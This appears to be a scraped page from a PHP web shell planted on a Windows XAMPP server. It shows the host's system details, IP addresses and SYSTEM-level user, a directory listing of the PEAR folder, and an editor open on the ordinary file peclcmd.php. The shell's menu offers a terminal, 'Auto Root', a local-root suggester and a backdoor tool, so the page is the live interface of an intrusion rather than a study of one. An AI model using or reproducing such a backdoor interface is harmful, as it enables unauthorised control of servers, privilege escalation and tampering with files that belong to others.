Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
php /
pear /
Delete
Unzip
Name
Size
Permission
Date
Action
.channels
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
.registry
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
Archive
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
Console
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
Event
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
File
[ DIR ]
drwxrwxrwx
2025-06-03 05:55
OS
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
PEAR
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
PHP
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
PHPUnit
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
PHPUnit2
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
Structures
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
Table
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
Text
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
XML
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
adodb
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
docs
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
examples
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
tests
[ DIR ]
drwxrwxrwx
2024-07-26 18:49
.depdb
2.38
KB
-rw-rw-rw-
2016-01-22 10:45
.depdblock
0
B
-rw-rw-rw-
2016-01-22 10:45
.filemap
6.75
KB
-rw-rw-rw-
2016-01-22 10:45
.lock
0
B
-rw-rw-rw-
2016-01-22 10:45
PEAR.php
34.63
KB
-rw-rw-rw-
2016-01-22 10:45
PHPUnit.php
4.01
KB
-rw-rw-rw-
2016-01-27 12:42
System.php
19.81
KB
-rw-rw-rw-
2016-01-22 10:45
Table.php
37.74
KB
-rw-rw-rw-
2016-01-27 12:12
pearcmd.php
15.3
KB
-rw-rw-rw-
2024-07-26 17:42
peclcmd.php
1.04
KB
-rw-rw-rw-
2024-07-26 17:42
Save
Rename
<?php /** * PEAR, the PHP Extension and Application Repository * * Command line interface * * PHP versions 4 and 5 * * @category pear * @package PEAR * @author Stig Bakken <ssb@php.net> * @author Tomas V.V.Cox <cox@idecnet.com> * @copyright 1997-2009 The Authors * @license http://opensource.org/licenses/bsd-license.php New BSD License * @link http://pear.php.net/package/PEAR */ /** * @nodep Gtk */ //the space is needed for windows include paths with trailing backslash // http://pear.php.net/bugs/bug.php?id=19482 if ('C:\xampp\php\pear ' != '@'.'include_path'.'@ ') { ini_set('include_path', trim('C:\xampp\php\pear '). PATH_SEPARATOR . get_include_path()); $raw = false; } else { // this is a raw, uninstalled pear, either a cvs checkout, or php distro $raw = true; } define('PEAR_RUNTYPE', 'pecl'); require_once 'pearcmd.php'; /* * Local variables: * tab-width: 4 * c-basic-offset: 4 * indent-tabs-mode: nil * mode: php * End: */ // vim600:syn=php ?>